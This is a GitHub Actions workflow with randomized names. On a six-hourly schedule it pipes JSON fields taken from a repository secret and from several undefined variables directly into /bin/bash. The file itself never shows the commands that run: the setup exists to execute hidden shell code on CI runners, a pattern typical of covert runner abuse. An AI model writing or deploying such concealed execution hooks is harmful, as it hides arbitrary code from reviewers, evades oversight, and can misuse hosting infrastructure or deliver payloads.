name: jintianwen7615

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jintianwen7615
        env:
          q11345: ${{ secrets.q11345 }}
        run: |
          echo $q11345 | jq -r .htds847 | /bin/bash
          echo $hzikl1230 | jq -r .so663 | /bin/bash
          echo $dldt2511 | jq -r .nh4 | /bin/bash
          echo $pdbus0094 | jq -r .psvmk436 | /bin/bash
          echo $jf6 | jq -r .hym531 | /bin/bash
          echo $coby75 | jq -r .c818 | /bin/bash
          echo $g0 | jq -r .k06 | /bin/bash

